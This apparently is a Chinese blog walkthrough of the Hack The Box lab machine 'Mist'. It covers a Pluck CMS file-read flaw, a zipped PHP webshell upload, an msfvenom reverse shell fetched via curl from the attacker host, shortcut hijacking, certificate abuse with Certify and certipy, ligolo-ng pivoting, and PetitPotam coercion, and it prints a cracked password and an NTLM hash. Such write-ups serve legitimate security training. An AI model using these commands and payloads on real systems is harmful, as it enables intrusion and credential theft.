HackTheBox-Mist

已于 2024-04-10 17:30:27 修改
阅读量1w 收藏 29
点赞数 16
分类专栏: HTB靶场合集 文章标签: Windows 提权 plock hack the box 内网横向
于 2024-04-01 14:27:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52742680/article/details/137227102
版权
本文详细描述了一次针对PluckCMS的黑客攻击过程,包括端口扫描、利用DirectoryTraversal漏洞读取文件、上传恶意脚本获取shell、通过创建快捷方式提权、请求和解析证书获取hash,最终通过responder和PetitPotam获取MS01$的哈希值。
摘要由CSDN通过智能技术生成

整体思路

端口扫描->Pluck CMS组件文件读取漏洞->文件上传获取shell->创建快捷方式提权->请求证书获得hash->

信息收集&端口利用

namp -sSVC 10.10.11.17

在这里插入图片描述

目标只开放了80端口,将mist.htb加入到hosts文件后,访问mist.htb

Pluck CMS文件读取

在这里插入图片描述

在主界面发现一个admin链接,访问它

在这里插入图片描述

Exploit-db中搜索相关漏洞,发现存在Pluck CMS 4.7 - Directory Traversal

在这里插入图片描述

能够做到任意文件读取,这里也尝试读取win.ini

在这里插入图片描述

发现被检测出攻击行为,怀疑是…/被探测,尝试绕过也无效

回到POC,根据POC来看,它是针对于album的文件读取,那么有没有地方是上传album的地方呢?经过寻找,发现data目录下还有一个settings文件夹,其中的/modules/albums文件夹下有一个admin_backup.php文件

在这里插入图片描述

在这里插入图片描述

用刚刚的POC对该文件进行读取

在这里插入图片描述

得到一串密文,使用hash-identifier识别出可能的hash值后,用john对其进行解密

在这里插入图片描述

在这里插入图片描述

解得密码为lexypoo97,登录进网站

文件上传获取shell

Pluck插件还存在一个文件上传漏洞,登录后在admin.php?action=installmodule目录下上传zip文件,将php代码打包进zip文件中,上传后即可访问到该php文件,具体步骤如下

访问文件上传界面

在这里插入图片描述

将大马写入php文件,压缩成zip文件

在这里插入图片描述

上传zip

在这里插入图片描述

上传完成后,会在/data/modules下看到上传的文件

在这里插入图片描述

访问she11/she11.php

在这里插入图片描述

本地开启http服务,上传完nc.exe后将shell反弹到kali上

在这里插入图片描述

在这里插入图片描述

创建快捷方式提权

在C:\Common Applications文件夹下看到了许多快捷方式,因此猜测提权方式为将Windows快捷方式(.lnk)指向/xmapp/htdocs/下的payload.exe,模拟用户点击来提权

在这里插入图片描述

创建payload.exe,并上传

kali:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=9100 -f exe -o payload.exe
靶机:curl http://10.10.14.8:9999/payload.exe -o payload.exe

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Notepad.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\payload.exe"
$lnk.Save()

等待一段时间后,相当于Brandon用户点击了该快捷方式,执行了payload.exe,拿到该用户权限

在这里插入图片描述

请求证书

Certify上传到靶机,查看能激活的证书模板

在这里插入图片描述

运行后,发现任何认证过的用户都可以请求并获取一个遵循User模板的客户端认证证书,使用Certify生成pem文件

.\Certify.exe request /ca:DC01.mist.htb\mist-DC01-CA /template:User

在这里插入图片描述

再使用openssl将pem格式转化为pfx格式,这一步指定密码为空

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

得到证书后,再使用certipy得到Hash

获取Hash

这里先使用ligolo-ng连接到内网(当然用chisel等也可以)

#kali新增ligolo的路由
ip tuntap add user root mode tun ligolo
ip link set ligolo up
#kali启动ligolo
./proxy -selfcert
#靶机与kali建立连接
\agent.exe -connect [ip]:11601 -ignore-cert
#获取靶机session
ligolo-ng » session
#查看ip,添加路由协议
[Agent : MIST\Brandon.Keywarp@MS01] » ifconfig
#建立隧道
[Agent : MIST\Brandon.Keywarp@MS01] » start
#kali添加到192.168.100.0网段的路由
ip route add 192.168.100.0/24 dev ligolo

在这里插入图片描述

操作完成后,即可ping通192.168.100.100

在这里插入图片描述

利用刚刚生成的pfx证书,配合certipy获得hash

certipy auth -pfx cert.pfx -u Brandon.Keywarp -domain mist.htb -dc-ip 192.168.100.100 -debug

在这里插入图片描述

得到brandon用户的hash:aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1d07082740626cc9

MS01$hash

在拿到brandon用户的hash后,能够使用responder配合PetitPotam拿到MS01$的hash值

#开启监听
responder -I tun0
#反弹验证消息
python PetitPotam.py -u 'brandon.keywarp' -hashes ':DB03D6A77A2205BC1D07082740626CC9' -pipe all -d mist.htb 10.10.14.24  192.168.100.101

在这里插入图片描述

获得MS01$的Hash值

接下去需要通过relay获取ldap shell,并且清除shadow creds

Str4w_AShiR
关注
专栏目录
HTB Mist
qq_58869808的博客
04-20 740
ADCS,PKinit,AD pentest,ECS13
Pluck 代码问题漏洞( CVE-2022-26965)
千寻的博客
12-01 1995
Pluck-CMS-Pluck-4.7.16 后台RCE
Pluck Cms文件上传结合命令执行复现
晚安這個未知的世界
03-14 1180
本漏洞影响 Pluck CMS Pluck CMS <=4.7.10 安装模版+文件包含导致任意命令执行 很多CMS都会在安装模版的时候getshell,那么这里笔者也发现了类似的漏洞。 在阅读自己下载下来得源码之后看到 目录下有.htaccess文件,直接把php设置为不可解析,所以无法直接访问 所以就想到需要找一个位置对其进行包含,来达到执行的目的。 首先看到admin.php中关于theme的部分 跟进 data/inc/theme.php,发现调用了get_themes()方法 跟进 fu
php里pluck,Pluck CMS后台另两处任意代码执行
weixin_39639260的博客
03-23 1719
前言本来是在cnvd上看到了有人发Pluck CMS的洞,但是没有公开细节,便想着自己挖一下。但是审完第一个后发现已经有两位同学写出来了当时自己的思路跟第一个同学一样,第二个同学的思路自己确实没有想到,佩服佩服。但是心有不甘,自己就继续挖掘了一下,又发现了两处可以任意命令执行的地方。正文第一处:过滤不严导致单引号逃逸这个跟第一篇思路一样,只不过找到了另一处未过滤的点在function.php里面b...
Pluck CMS 中文版
03-26
Pluck是一个非常简单易用的PHP平台CMS(内容管理系统)。通过Pluck,即使不了解网络编程语言也可以建立自己的站点。 Pluck致力于让每个人都可以容易地管理自己的站点。对于所有的小型站点来说,Pluck是个不错的选择。Pluck发布于GPL协议下,是一个完全开源的平台。 cnPluck是一个致力于在中文领推广PluckCMS的站点 使用PluckCMS建立您的站点需要PHP5+运行环境,以及不小于5MB的站点空间(安装PluckCMS大约需要占用3MB空间)。 您不需要SQL数据库,PluckCMS使用半静态的.php文件存储数据
cnPluck CMS v4.6.3 简体中文版
05-17
Pluck是一个非常简单易用的PHP平台CMS(内容管理系统)。通过Pluck,即使不了解网络编程语言也可以建立自己的站点。 Pluck致力于让每个人都可以容易地管理自己的站点。对于所有的小型站点来说,Pluck是个不错的选择。Pluck发布于GPL协议下,是一个完全开源的平台。 cnPluck是一个致力于在中文领推广Pluck CMS的站点 使用Pluck CMS建立您的站点需要PHP5+运行环境,以及不小于5MB的站点空间(安装Pluck CMS大约需要占用3MB空间)。 您不需要SQL数据库,Pluck CMS使用半静态的.php文件存储数据  
Hack The Box-Analytics
m0_52742680的博客
12-27 678
发现存在22、80端口。
肖申克的救赎--剧本
weixin_34315485的博客
01-07 8151
 Screenplays for You - free movie scripts and screenplays Screenplays and movie scripts organized alphabetically: ...
大前端 - 泛客户端 - Electron
weixin_38245947的博客
06-27 1295
Electron 是一个跨平台的、基于 Web 前端技术的桌面 GUI 应用程序开发框架。使用 Web 前端技术来开发一个桌面 GUI 程序是一件多么炫酷的事情,你可以使用 HTML、CSS 来绘制界面和控制布局,使用 JavaScript 来控制用户行为和业务逻辑,使用 Node.js 来通信、处理音频视频等,几乎所有的 Web 前端技术和框架(jQuery、Vue、React、Angular 等)都可以应用到桌面 GUI 开发中。至此,JavaScript 这门神奇的语言除了能开发 Web 前端、Web
The Zen of Python
MADNESS
03-24 1514
http://python.net/~goodger/projects/pycon/2007/idiomatic/handout.html http://www.python.org/dev/peps/pep-0020/ Beautiful is better than ugly. Explicit is better than implicit. Simple is be
PHP实例开发源码——简单的php内容管理系统 pluck cms 中文版.zip
11-26
PHP实例开发源码——简单的php内容管理系统 pluck cms 中文版
matlab集成c代码-MIST:显微镜图像拼接工具
05-22
美国国家标准技术研究所正在开发显微镜图像拼接工具(MIST)。 第一个版本是ImageJ / Fiji插件。 下一个版本将添加一个独立工具。 该存储库在一个分支中包含插件的源代码,在另一个分支中包含MATLAB原型的源代码。 ...
开源项目-nanopack-mist.zip
09-05
mist-master目录中,通常会包含以下内容: 1. **源代码**:项目的主要实现,包括核心组件如Broker、客户端库等。 2. **配置文件**:用于设置系统参数和行为的文件。 3. **构建脚本**:帮助用户编译和安装项目,...
squeezenet的matlab代码-fashion-mist:时尚迷雾
06-17
挤压网的matlab代码时尚-MNIST 目录 Fashion-MNIST是文章图像的数据集——由 60,000 个示例的训练集和 10,000 个示例的测试集组成。 每个示例都是一个 28x28 灰度图像,与来自 ...我们打算将Fashion-MNIST作为原始机器...
Api-mist.zip
09-18
Api-mist.zip,Spark ClusterHydrosphere Mist的无服务器代理,一个api可以被认为是多个软件设备之间通信的指导手册。例如,api可用于web应用程序之间的数据库通信。通过提取实现并将数据放弃到对象中,api简化了编程...
单词 2012-01-19
huobengle
01-19 1230
mobilize [5mEubilaiz] v. 动员 mobilize mo.bi.lize AHD:[m½“b…-lºz”] D.J.[6moub*7laiz] K.K.[6mob*7la!z] v.(动词) mo.bi.lized, mo.bi.liz.ing, mo.bi.liz.es v.tr.(及物动词) To make mobile or capable...
Earth-mist:单点登录服务
02-04
统一认证中心 介绍 基于Vert.x的统一认证中心 摇动 特性 基于属性配置进行项目定制 极简xml 自动加载依赖jar配置属性无需额外配置 原理 登录信息传递 用户首次登录时流程如下 用户浏览器访问系统A需登录限制资源,...
中国行政村区划代码及地理坐标-最新数据.zip
最新发布
11-17
中国行政村区划代码及地理坐标-最新数据.zip
pocketsphinx-0.1.15-cp35-cp35m-win_amd64.whl.rar
11-17
python whl离线安装包 pip安装失败可以尝试使用whl离线安装包安装 第一步 下载whl文件,注意需要与python版本配套 python版本号、32位64位、arm或amd64均有区别 第二步 使用pip install XXXXX.whl 命令安装,如果whl路径不在cmd窗口当前目录下,需要带上路径 WHL文件是以Wheel格式保存的Python安装包, Wheel是Python发行版的标准内置包格式。 在本质上是一个压缩包,WHL文件中包含了Python安装的py文件和元数据,以及经过编译的pyd文件, 这样就使得它可以在不具备编译环境的条件下,安装适合自己python版本的库文件。 如果要查看WHL文件的内容,可以把.whl后缀名改成.zip,使用解压软件(如WinRAR、WinZIP)解压打开即可查看。 为什么会用到whl文件来安装python库文件呢? 在python的使用过程中,我们免不了要经常通过pip来安装自己所需要的包, 大部分的包基本都能正常安装,但是总会遇到有那么一些包因为各种各样的问题导致安装不了的。 这时我们就可以通过尝试去Python安装包大全中(whl包下载)下载whl包来安装解决问题。
mist python
09-02
"MIST Python" 是一个基于Python编程语言的开发平台和工具集。它的名称中的"MIST"代表了"Modular, Innovative, Scalable, and Transparent",也即"模块化,创新性,可扩展性和透明性"。 作为一个开发平台,MIST Python提供了一系列的功能和功能模块,以帮助开发人员更高效地进行软件开发。它具有模块化的特点,可以根据不同的需求和项目要求使用不同的模块,以简化开发过程并提高开发效率。 MIST Python也是一个创新性的平台,它不仅提供了传统的开发功能,还提供了许多创新的工具和技术,以便开发人员可以更加灵活和高效地开发应用程序。 另外,MIST Python还具有良好的可扩展性,它可以轻松地与其他Python库和工具进行集成,以满足不同项目的需求。这使得开发人员能够在使用MIST Python时更加自由地选择和组合各种功能和资源。 最后,MIST Python还强调透明性,它提供了清晰和可读性强的代码结构和文档,使开发人员能够更好地理解和使用平台。这也有助于团队合作和知识共享。 总而言之,MIST Python是一个以Python为基础的开发平台和工具集,具有模块化、创新性、可扩展性和透明性的特点,以帮助开发人员更加高效地进行软件开发。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值